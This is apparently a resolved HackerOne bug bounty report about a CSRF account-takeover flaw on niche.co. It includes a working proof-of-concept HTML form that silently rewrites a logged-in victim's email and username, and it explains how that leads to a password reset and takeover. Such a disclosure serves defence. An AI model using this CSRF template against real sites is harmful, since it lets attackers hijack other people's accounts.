URGENT : NICHE.co Account Take Over Vulnerability

Disclosed: 2015-12-21 22:16:28 By hussein98d To x
Unknown
Vulnerability Details
Hello ! This is an urgent report that you should immediately take care of !! I found out an account take over vulnerability on your acquisition : niche.co # Proof of concept code <html> <head> <title>CSRF Attack Page: /get-started/complete</title> </head> <body> <!-- attack --> <form method="POST" action="https://www.niche.co/get-started/complete"> <input type="hidden" name="utf8" value="✓"/> <input type="hidden" name="_method" value="patch"/> <input type="hidden" name="authenticity_token" value=""/> <input type="hidden" name="commit" value="Get Started"/> <input type="hidden" name="user[name]" value="Hacked"/> <input type="hidden" name="user[email]" value="[email protected]"/> <input type="hidden" name="user[username]" value="hacked123"/> <input type="hidden" name="user[phone_number]" value=""/> <input type="hidden" name="user[location_id]" value="79790"/> <input type="hidden" name="user[gender]" value=""/> <input type="submit" value="submit">s </form> <!-- /attack --> </body> <html> The `authenticity_token` parameter is not properly validated by the end of the server when a user submits the form . A hacker can , after changing the email of his victim , reset the password and login without any problem ! Here is a video that I made : https://youtu.be/L7fMJkm7sp8 (unlisted video) Best Regards Hussein
Actions
View on HackerOne
Report Stats
  • Report ID: 100849
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report